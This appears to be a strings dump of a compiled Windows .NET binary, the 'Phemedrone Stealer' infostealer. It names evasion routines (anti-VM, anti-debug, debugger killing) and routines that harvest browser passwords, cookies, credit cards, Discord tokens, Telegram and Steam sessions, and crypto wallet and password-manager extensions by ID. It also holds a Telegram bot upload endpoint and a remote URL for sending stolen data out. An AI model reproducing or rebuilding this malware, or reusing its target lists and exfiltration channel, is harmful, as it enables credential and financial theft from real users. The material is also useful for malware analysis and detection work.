!This program cannot be run in DOS mode.
`.rsrc
@.reloc
V0; )UU
% &r&%
% (r8%
% *rF%
% +rn%
% ,rt%
Y _c
Y _c
\ /o`
KDBM(
v4.0.30319
#Strings
__StaticArrayInitTypeSize=10
<>9__0_0
<Main>b__0_0
<GetInheritedClasses>b__0_0
<>c__DisplayClass0_0
<>9__2_0
<Collect>b__2_0
<>c__DisplayClass2_0
<Collect>g__AddFile|2_0
<>9__13_0
<Concat>b__13_0
<>c__DisplayClass3_0
<>9__4_0
<ParseDiscordTokens>b__4_0
<>c__DisplayClass4_0
<>c__DisplayClass5_0
<>c__DisplayClass6_0
<>9__8_0
<GetWindowsVersion>b__8_0
<>c__DisplayClass8_0
<>9__0
<IsVM>b__0
<IsCIS>b__0
<Key3Database>b__0
<ParseDatabase>b__0
<Create>b__0
<ParsePasswords>b__0
<ParseExtensions>b__0
<KillDebuggers>b__0
<ParseColdWallets>b__0
<ParseDatWallets>b__0
<Collect>b__0
<ParseMasterKey>b__0
get_<>h__TransparentIdentifier0
D38F1F4A152CEB94D7366FB851BD64D0C557CD57A0486E57BFB5926A910D5111
<Finalize>d__11
8688D249E9D047B4FC2FB89CE05AFE9EC89252FFCCDD969DE6EEF260DD7FFB21
HMACSHA1
F9CD20F9BE4EBA8920C22293BAF9687E83B65C0DD5D44641A905FC535BC053B1
<>9__0_1
<Main>b__0_1
<GetInheritedClasses>b__0_1
<KillDebuggers>b__0_1
<>c__DisplayClass0_1
<>9__2_1
<Collect>b__2_1
<>c__DisplayClass2_1
<>9__4_1
<ParseDiscordTokens>b__4_1
<>9__5_1
<Key3Database>b__5_1
<>c__DisplayClass6_1
<>9__1
<IsVM>b__1
<Collect>b__1
<>c__0`1
Func`1
IEnumerable`1
Predicate`1
Action`1
EqualityComparer`1
IEnumerator`1
List`1
get_<>h__TransparentIdentifier1
CS$<>8__locals1
__StaticArrayInitTypeSize=12
Microsoft.Win32
UInt32
ToInt32
PBKDF2
<>9__2_2
<Collect>b__2_2
<>c__DisplayClass2_2
<>9__4_2
<ParseDiscordTokens>b__4_2
<>9__5_2
<Key3Database>b__5_2
<>9__2
<Main>b__2
<Collect>b__2
<>f__AnonymousType0`2
<>f__AnonymousType1`2
<>f__AnonymousType2`2
Func`2
IGrouping`2
KeyValuePair`2
Dictionary`2
<>h__TransparentIdentifier2
<>9__0_3
<Main>b__0_3
<>9__2_3
<Collect>b__2_3
<>9__4_3
<ParseDiscordTokens>b__4_3
<>9__5_3
<Key3Database>b__5_3
Func`3
UInt64
ToInt64
<>9__0_4
<Main>b__0_4
<>9__5_4
<Key3Database>b__5_4
<ParseDiscordTokens>b__4
<Collect>b__4
<>9__0_5
<Main>b__0_5
<>9__5_5
<Key3Database>b__5_5
<Collect>b__5
HMACSHA256
__StaticArrayInitTypeSize=6
<>9__5_6
<Key3Database>b__5_6
<>9__6
<Main>b__6
4644D25C296EA1EDD5CA2B89F2032ACB2831E8D6D2BB65F379E56AE3E993AD27
get_UTF8
EncodeUTF8
EncodeUtf8
BAAD10E40DF6B5D52A22FCCE498BBD641EBB2377BB7DA4FE04EE26F084647F69
7D78CB380BF5EFB7B851409CA6A875F77DECF09D19B9149DA17A3EBF674BC0F9
<Module>
<PrivateImplementationDetails>
BerkeleyDB
BuildID
CCH_RM_MAX_SVC_NAME
CCH_RM_MAX_APP_NAME
FILETIME
RM_APP_TYPE
F18366628A466F286AC60A27D59CADD5FD347730C9D55E04CE70FFDA96CB236F
get_ASCII
AntiVM
RM_PROCESS_INFO
System.IO
AntiCIS
RM_UNIQUE_PROCESS
GetCPU
get_IV
set_IV
value__
get_Data
set_Data
CbData
cbData
pbData
fileData
_cbAuthData
_pbAuthData
CryptUnprotectData
get_data
mscorlib
DataBlob
GetMac
DecryptByteDesCbc
DecryptStringDesCbc
System.Collections.Generic
AddStreamAsync
get_Id
get_ManagedThreadId
<>l__initialThreadId
pszAlgId
TSSessionId
childProcessId
dwProcessId
chatId
GetProcessById
get_CurrentThread
pnProcInfoNeeded
SHA1Managed
AesManaged
Opened
_isDisposed
get_encrypted
pReserved
ComputeVoid
NewGuid
GetHwid
<<>h__TransparentIdentifier0>i__Field
<<>h__TransparentIdentifier1>i__Field
<data>i__Field
<encrypted>i__Field
<file>i__Field
<match>i__Field
<Data>k__BackingField
<MasterPassword>k__BackingField
<Type>k__BackingField
<Path>k__BackingField
<Algorithm>k__BackingField
<Vector>k__BackingField
<MasterPass>k__BackingField
<Objects>k__BackingField
<Keys>k__BackingField
<Lenght>k__BackingField
<Salt>k__BackingField
<GlobalSalt>k__BackingField
<EntrySalt>k__BackingField
<Content>k__BackingField
<IterationCount>k__BackingField
<CipherText>k__BackingField
<Ciphertext>k__BackingField
<PartIv>k__BackingField
<Key>k__BackingField
RecordHeaderField
ReadToEnd
Append
get_Second
set_Method
method
FormatCreditCard
WriteEndRecord
LogRecord
WriteCentralDirRecord
HasDiscord
get_MasterPassword
masterPassword
FormatPassword
password
NetworkInterface
Replace
IsNullOrWhiteSpace
IService
RmService
SenderService
service
CreateInstance
Sequence
_cbNonce
_pbNonce
source
GetHashCode
set_Mode
PaddingMode
chainingMode
CryptoStreamMode
CompressionMode
CipherMode
get_Unicode
get_BigEndianUnicode
FromImage
_centralDirImage
ZipStorage
storage
InputLanguage
language
AddRange
FormatCookie
EndInvoke
BeginInvoke
CrcTable
ReadTable
ReadMasterTable
IEnumerable
IDisposable
bRestartable
ToDouble
RuntimeFieldHandle
RuntimeTypeHandle
GetTypeFromHandle
pSessionHandle
dwSessionHandle
localStateFile
get_file
TakeWhile
RmConsole
hModule
get_Name
procName
methodName
tableName
lpFileName
GetFileName
ParseProfileName
profileName
get_MachineName
dllName
ItemName
strAppName
get_UserName
GetBrowserName
browserName
get_ProcessName
strServiceShortName
get_DirectoryName
NormalizedFilename
filename
username
hostname
modTime
ToFileTime
DateTime
CreationTime
DateTimeToDosTime
AccessTime
ProcessStartTime
ModifyTime
AppendLine
WriteLine
Combine
Phemedrone
get_Type
set_Type
pszBlobType
ValueType
SecurityProtocolType
ApplicationType
set_ContentType
myType
Compare
System.Core
secure
get_Culture
get_InvariantCulture
culture
Capture
ReadOnlyCollectionBase
Key3Database
Key4Database
ParseDatabase
WebResponse
GetResponse
System.IDisposable.Dispose
toParse
Reverse
Create
MulticastDelegate
Deflate
DebuggerBrowsableState
<>1__state
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
DebuggerBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
ParamArrayAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
get_Minute
Compute
ReadByte
get_Value
NullableValue
GetValue
DecryptValue
NextValue
MutexValue
set_Expect100Continue
HiddenCallResolve
Remove
system.exe
get_Size
CbSize
cbSize
CompressedSize
_pageSize
GrabberFileSize
_sqlDataTypeSize
MaxAuthTagSize
get_HashSize
set_BlockSize
_blockSize
totalSize
Get32BitSize
set_KeySize
Deserialize
SuppressFinalize
Resize
SizeOf
IsSubclassOf
IndexOf
_cbTag
_pbTag
authTag
Config
get_Png
System.Threading
set_Padding
_dbEncoding
GetEncoding
DefaultEncoding
System.Drawing.Imaging
Phemedrone.Cryptography.Hashing
System.Runtime.Versioning
FromBase64String
DownloadString
ParseString
JsonString
ToString
GetString
OctetString
hexString
Substring
disposing
ForceDeflating
System.Drawing
ConvertToULong
AntiDebug
ForEach
get_match
ComputeHash
get_Path
set_Path
levelDbPath
dbPath
fullPath
GetFolderPath
get_Length
SetLength
set_ContentLength
length
EndsWith
StartsWith
get_Month
GrabberDepth
currentDepth
maxDepth
AsyncCallback
callback
CISCheck
performCheck
MutexCheck
FlushFinalBlock
TransformFinalBlock
get_CanSeek
AllocHGlobal
FreeHGlobal
RmCritical
Marshal
System.ComponentModel
SendPanel
PriorityLevel
CheckAll
kernel32.dll
rstrtmgr.dll
FormatAutofill
System.Xml
set_SecurityProtocol
AntiVm
GetUsedRam
GetTotalRam
AddStream
_zipFileStream
get_BaseStream
DeflateStream
NetworkStream
CryptoStream
GetStream
GetRequestStream
MemoryStream
stream
HasSteam
Telegram
Program
AesGcm
get_Item
get_Is64BitOperatingSystem
system
get_Algorithm
SymmetricAlgorithm
phAlgorithm
KeyedHashAlgorithm
algorithm
ICryptoTransform
RootNum
rowNum
Medium
Chromium
Boolean
IsLittleEndian
littleEndian
CopyFromScreen
_leaveOpen
DwInfoVersion
browserVersion
GetWindowsVersion
RmEndSession
RmStartSession
System.IO.Compression
get_Location
profileLocation
rootLocation
location
System.Net.NetworkInformation
GetGeoInformation
pszImplementation
System.Globalization
System.Xml.Serialization
System.Reflection
InputLanguageCollection
MatchCollection
ManagementObjectCollection
get_Position
set_Position
Win32Exception
NotSupportedException
DirectoryNotFoundException
PathTooLongException
ArgumentNullException
InvalidOperationException
UnauthorizedAccessException
ArgumentException
pszDescription
StringComparison
searchPattern
pattern
CopyTo
CreateExtraInfo
pnProcInfo
BcryptAuthenticatedCipherModeInfo
FileInfo
fileInfo
CultureInfo
pPaddingInfo
FileSystemInfo
Bitmap
FilenameInZip
filenameInZip
hwndApp
RmUnknownApp
System.Linq
<<>h__TransparentIdentifier0>j__TPar
<<>h__TransparentIdentifier1>j__TPar
<data>j__TPar
<encrypted>j__TPar
<file>j__TPar
<match>j__TPar
get_Year
Asn1Der
FileGrabber
number
WriteLocalHeader
SQLiteReader
XmlReader
StreamReader
TextReader
BinaryReader
reader
ImportHider
SHA1CryptoServiceProvider
RSACryptoServiceProvider
TripleDESCryptoServiceProvider
BCryptCloseAlgorithmProvider
BCryptOpenAlgorithmProvider
IFormatProvider
provider
StringBuilder
SpecialFolder
placeholder
ISender
Buffer
FileManager
ServicePointManager
Integer
AntiDebugger
ManagementObjectSearcher
bCipher
ObjectIdentifier
lineHandler
LockHelper
ToUpper
RmExplorer
JsonParser
IBrowser
StreamWriter
TextWriter
BinaryWriter
GetDelegateForFunctionPointer
ServiceCounter
PerformanceCounter
BitConverter
RuntimeResolver
ToLower
XmlSerializer
GetLastWin32Error
IEnumerator
ManagementObjectEnumerator
System.Collections.Generic.IEnumerable<Phemedrone.Classes.LogRecord>.GetEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
get_Vector
set_Vector
CreateDecryptor
CreateEncryptor
IntPtr
get_Hour
GetGPUs
Graphics
System.Diagnostics
AddRecords
records
ParsePasswords
TripleDes
GetAllNetworkInterfaces
Phemedrone.Services
nServices
System.Runtime.InteropServices
System.Runtime.CompilerServices
RmRegisterResources
DebuggingModes
get_InstalledInputLanguages
Matches
GetDirectories
_masterTableEntries
_tableEntries
EnumerateFiles
_existingFiles
nFiles
GetFiles
_files
ListProfiles
profiles
NumberStyles
_fieldNames
rgsServiceNames
rgsFilenames
System.Runtime.InteropServices.ComTypes
GetTypes
expires
Phemedrone.Classes
GetInheritedClasses
GetLockingProcesses
GetProcesses
_fileBytes
ReadAllBytes
HexToBytes
_bufferBytes
GetAddressBytes
GetBytes
values
UpdateCrcAndSizes
dwSessionFlags
dwPromptFlags
DwFlags
dwFlags
get_Ticks
Equals
System.Windows.Forms
ParseDiscordTokens
Contains
descriptoins
Phemedrone.Extensions
ParseExtensions
System.Text.RegularExpressions
rgApplications
nApplications
iterations
System.Collections
Phemedrone.Protections
StringSplitOptions
lpdwRebootReasons
FilePatterns
GetDeviceCaps
rgAffectedApps
get_Chars
Phemedrone.Senders
KillDebuggers
debuggers
RuntimeHelpers
BrowserHelpers
Phemedrone.Services.Browsers
ListBrowsers
RSAParameters
ImportParameters
WaitForPendingFinalizers
get_MasterPass
masterPass
get_IsClass
FileAccess
_access
GetOwnerProcess
process
GetProcAddress
GetPhysicalAddress
get_Objects
System.Net.Sockets
ParseColdWallets
CryptoWallets
ParseDatWallets
Arguments
Exists
get_OperationalStatus
AppStatus
arrays
get_Keys
Concat
AppendFormat
ImageFormat
get_IsAbstract
Extract
ManagementBaseObject
hObject
Asn1DerObject
ManagementObject
cbKeyObject
pbKeyObject
object
Select
Collect
Connect
Distinct
CryptprotectPromptstruct
System.Net
wallet
System.Collections.IEnumerator.Reset
useOffset
ReadTableFromOffset
HeaderOffset
_offset
get_Lenght
set_Lenght
set_DefaultConnectionLimit
get_Salt
get_GlobalSalt
globalSalt
get_EntrySalt
entrySalt
get_Default
FirstOrDefault
pcbResult
IAsyncResult
result
GetBytesFromInt
WebClient
TcpClient
System.Management
SqlStatement
Comment
_comment
Environment
System.Collections.Generic.IEnumerator<Phemedrone.Classes.LogRecord>.Current
System.Collections.IEnumerator.Current
System.Collections.Generic.IEnumerator<Phemedrone.Classes.LogRecord>.get_Current
System.Collections.IEnumerator.get_Current
<>2__current
get_Content
set_Content
get_Count
CreditCardCount
CookieCount
AutoFillCount
get_IterationCount
FilesCount
ExtensionsCount
WalletsCount
GetRowCount
Screenshot
browserRoot
pPrompt
szPrompt
BCrypt
BCryptDecrypt
Encrypt
ThreadStart
TrimStart
Convert
FailFast
HttpWebRequest
MakeFormRequest
DiscordList
PasswordList
ToList
RmGetList
set_Timeout
cbInput
pbInput
cbOutput
pbOutput
MoveNext
System.Text
ReadAllText
pPlainText
get_CipherText
pCipherText
cipherText
_cbMacContext
_pbMacContext
get_Ciphertext
ciphertext
get_PartIv
partIv
get_Now
RmMainWindow
RmOtherWindow
endIdx
startIdx
_bufferEndIndex
_blockIndex
nIndex
_bufferStartIndex
startIndex
prefix
GroupBy
get_Day
InitializeArray
ToArray
InfoArray
get_Key
set_Key
publicKey
GenerateKey
DeserializeKey
strSessionKey
ParseMasterKey
masterKey
hImportKey
BCryptImportKey
BCryptDestroyKey
Phemedrone.Cryptography
System.Security.Cryptography
GetAssembly
GetEntryAssembly
httpOnly
SelectMany
BlockCopy
pEntropy
GetSummary
LoadLibrary
currentDirectory
directory
TableEntry
ZipFileEntry
SqliteMasterEntry
Registry
op_Equality
op_Inequality
get_Priority
BCryptGetProperty
BCryptSetProperty
pszProperty
WrapNonExceptionThrows
Windows Application
Copyright
2023
$4F484650-2787-4FAC-A477-EC30FFAFCD5D
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
_CorExeMain
mscoree.dll
8eXIfMM
UTZak<
f&[P[[
E6d.D3k
C!U3{z
gU1m}q
w?l|<q
%w03z&
:`>3c'
2_Qn 0
mWQuTZ
+*CEMVX
*)UVcKe
`Osny[)
4-GS}4
ZS;Q@J
W$Fl5 .
rdMM^ M
1Z[iv`
39}k|m
(f)tLY
L3 \N,
_PdB,+ZXZ
Izn@.Z
=rDj/4
w>IJZbR
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
e!g#h'
! #"$"&%'%(%/.0.21316598:8;8<8=8BACADAGFIHJHKHLHNMOMQPRPSPTPUPVPWPXPZY[Y\Y^]dcjikili
{{ file = {0}, data = {1} }}
{{ <>h__TransparentIdentifier0 = {0}, match = {1} }}
{{ <>h__TransparentIdentifier1 = {0}, encrypted = {1} }}
https://rakishevkenes.com/wp-load.php
Apuzony
Password.txt
Messengers/Discord Tokens.txt
wallet.dat
Wallets/
Armory
Atomic
atomic\Local Storage\leveldb
Bytecoin
bytecoin
Coninomi
Coinomi\Coinomi\wallets
com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
Electrum
Electrum\wallets
Exodus
Exodus\exodus.wallet
Guarda
Guarda\Local Storage\leveldb
Profiles
key3.db
key4.db
cookies.sqlite
moz_cookies
formhistory.sqlite
moz_formhistory
Browser Data/Cookies_
Browser Data/AutoFills_
logins.json
encryptedUsername
encryptedPassword
hostname
metaData
password
2A864886F70D010C050103
ISO-8859-1
password-check
2A864886F70D01050D
nssPrivate
global-salt
Version
User Data
1.0.0.0
Local State
Network
Cookies
cookies
Web Data
autofill
Login Data
logins
credit_cards
Local Storage
leveldb
CreditCards.txt
Profile*
Default
Authenticator
bhghoamapcdpbohphigoooaddinpkbai
EOS Authenticator
oeljdldpnmdbchonielidgobddffflal
BrowserPass
naepdomgkenhinolocfifgehidddafch
bmikpgodpkclnkgmnpphehdgcimmided
Splikity
jhfjfclepacoldmjmkmdlmganfaalklb
CommonKey
chgfefjpcobfbnpmiokfjjaglahmnded
Zoho Vault
igkpcodhieompeloncfnbekccinhapdb
Norton Password Manager
admmjipmmciaobhojoghlmleefbicajg
Avira Password Manager
caljgklbbfbcjjanaijlacgncafpegll
Trezor Password Manager
imloifkgjagghnncjkhggdhalmcnfklk
MetaMask
nkbihfbeogaeaoehlefnkodbefgpgknn
TronLink
ibnejdfjmmkpcnlpebklmnkoeoihofec
BinanceChain
fhbohimaelbohpjbbldcngcnapndodjp
Coin98
aeachknmefphepccionboohckonoeemg
iWallet
kncchdigobghenbbaddojjnnaogfppfj
Wombat
amkmjjmmflddogmhpjloimipbofnfjih
MEW CX
nlbmnnijcnlegkjjpcfjclmcfggfefdm
NeoLine
cphhlgmgameodnhkjdmkpanlelnlohao
Terra Station
aiifbnbfobpmeekipheeijimdpnlpgpp
dmkamcknogkgcdfhhbddcghachkejeap
Sollet
fhmfendgdocmcbmfikdcogofphimnkno
ICONex
flpiciilemghbmfalicajoolhkkenfel
hcflpincpppdclinealmandijcmnkbgn
TezBox
mnfifefkajgofkcjkemidiaecocnkjeh
nlgbhdfgdhgbiamfdfmbikcdghidoadd
OneKey
ilbbpajmiplgpehdikmejfemfklpkmke
Trust Wallet
pknlccmneadmjbkollckpblgaaabameg
MetaWallet
pfknkoocfefiocadajpngdknmkjgakdg
Guarda Wallet
fcglfhcjfpkgdppjbglknafgfffkelnm
idkppnahnmmggbmfkjhiakkbkdpnmnon
Jaxx Liberty
mhonjhhcgphdphdjcdoeodfdliikapmj
Atomic Wallet
bhmlbgebokamljgnceonbncdofmmkedg
hieplnfojfccegoloniefimmbfjdgcgp
Mycelium
pidhddgciaponoajdngciiemcflpnnbg
Coinomi
blbpgcogcoohhngdjafgpoagcilicpjh
GreenAddress
gflpckpfdgcagnbdfafmibcmkadnlhpj
doljkehcfhidippihgakcihcmnknlphh
nbokbjkelpmlgflobbohapifnnenbjlh
Samourai Wallet
apjdnokplgcjkejimjdfjnhmjlbpgkdi
ieedgmmkpkbiblijbbldefkomatsuahh
jifanbgejlbcmhbbdbnfbfnlmbomjedj
Airbitz
KeepKey
dojmlmceifkfgkgeejemfciibjehhdcl
Trezor
jpxupxjxheguvfyhfhahqvxvyqthiryh
Ledger Live
pfkcfdjnlfjcmkjnhcbfhfkkoflnhjln
Ledger Wallet
hbpfjlflhnmkddbjdchbbifhllgmmhnm
Bitbox
ocmfilhakdbncmojmlbagpkjfbmeinbd
Digital Bitbox
dbhklojmlkgmpihhdooibnmidfpeaing
YubiKey
mammpjaaoinfelloncbbpomjcihbkmmc
Google Authenticator
khcodhlfkpmhibicdjjblnkgimdepgnd
Microsoft Authenticator
bfbdnbpibgndpjfhonkflpkijfapmomn
gjffdbjndmcafeoehgdldobgjmlepcal
Duo Mobile
eidlicjlkaiefdbgmdepmmicpbggmhoj
OTP Auth
bobfejfdlhnabgglompioclndjejolch
FreeOTP
elokfmmmjbadpgdjmgglocapdckdcpkn
Aegis Authenticator
ppdjlkfkedmidmclhakfncpfdmdgmjpm
LastPass Authenticator
cfoajccjibkjhbdjnpkbananbejpkkjb
Dashlane
flikjlpgnpcjdienoojmgliechmmheek
Keeper
gofhklgdnbnpcdigdgkgfobhhghjmmkj
RoboForm
hppmchachflomkejbhofobganapojjol
KeePass
lbfeahdfdkibininjgejjgpdafeopflb
KeePassXC
kgeohlebpjgcfiidfhhdlnnkhefajmca
Bitwarden
inljaljiffkdgmlndjkdiepghpolcpki
NordPass
njgnlkhcjgmjfnfahdmfkalpjcneebpl
LastPass
gabedfkgnbglfbnplfpjddgfnbibkmbb
Local Extension Settings
Browser Data/Extensions/
Module Info Cache
Last Version
*cord*
FileGrabber
,d88b.d88b,
88888888888 Phemedrone Stealer
`Y8888888Y' {0:dd/MM/yyyy HH:mm:ss}
`Y888Y' Developed by https://t.me/reyvortex & https://t.me/TheDyer
`Y' Tag: {1}
----- Geolocation Data -----
{2,-25}{3}
{4,-25}{5} ({6})
{7,-25}{8}
{9,-25}{10}
{11,-25}{12}
----- Hardware Info -----
{13,-25}{14}\{15}
{16,-25}{17} {18}
{19,-25}{20}
{21,-25}{22}
{23,-25}{24}
{25,-25}{26} / {27} GB
----- Report Contents -----
{28,-25}{29}
{30,-25}{31}
{32,-25}{33}
{34,-25}{35}
{36,-25}{37}
{38,-25}{39}
{40,-25}{41}
----- Miscellaneous -----
{42,-25}{43}
{44,-25}{45}
Country:
country
countryCode
Postal:
Username:
Windows name:
Hardware ID:
{0,-25}
Passwords:
Cookies:
Credit Cards:
AutoFills:
Extensions
Wallets:
Files:
Antivirus products:
File Location:
unknown
Information.txt
*Phemedrone Stealer Report* \| by @reyvortex & @TheDyer
``` - IP: {0} \({1}\)
- Tag: {2} {3}
- Passwords: {4}
- Cookies: {5}
- Wallets: {6}```
https://github\.com/REvorker1/Phemedrone\-Stealer
Unknown
-Phemedrone-Report.zip
http://ip-api.com/json/?fields=11827
root\SecurityCenter2
SELECT * FROM AntivirusProduct
displayName
Memory
Available Bytes
SELECT * FROM Win32_VideoController
SELECT * FROM Win32_Processor
SELECT * FROM Win32_ComputerSystem
TotalPhysicalMemory
Win32_Processor
ProcessorId
Win32_DiskDrive
SerialNumber
SELECT * FROM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
user32.dll
gdi32.dll
GetDeviceCaps
Screenshot.png
*ssfn*
\config
Steam/
HKEY_CURRENT_USER\Software\Valve\Steam
SteamPath
HKEY_CLASSES_ROOT\tg\DefaultIcon
usertag
settings
key_data
prefix
Messengers/Telegram/
filename
filedescription
----------------------------
multipart/form-data; boundary=
Content-Disposition: form-data; name="
"; filename="
Content-Type: application/octet-stream
https://api.telegram.org/bot{0}/sendDocument
document
chat_id
parse_mode
MarkdownV2
caption
wireshark
httpdebbugerui
VirtualBox
VMware Virtual
VMware
Hyper-V Video
az-Latn-AZ
tg-Cyrl-TJ
Name:
Value:
Hostname:
Username:
Password:
Browser:
Number: {0}
Placeholder: {1}
Expiration: {2}/{3}
Browser: {4} v{5} ({6})
encrypted_key
dQw4w9WgXcQ:[^"]*
dQw4w9WgXcQ:
SELECT * FROM Win32_Process WHERE ProcessId = {0}
root\CIMV2
ParentProcessId
UNIQUE
Writing is not allowed
bcrypt.dll
BCryptDecrypt
BCryptDestroyKey
BCryptCloseAlgorithmProvider
Microsoft Primitive Provider
ChainingModeGCM
BCryptOpenAlgorithmProvider
BCryptSetProperty
ChainingMode
AuthTagLength
BCryptImportKey
ObjectLength
KeyDataBlob
BCryptGetProperty
crypt32.dll
CryptUnprotectData
algorithm
Algorithm cannot be null.
Password cannot be null.
Salt cannot be null.
Derived key too long.
SEQUENCE {
{0:X2}
INTEGER
OCTETSTRING
OBJECTIDENTIFIER
00061561
WEBASYST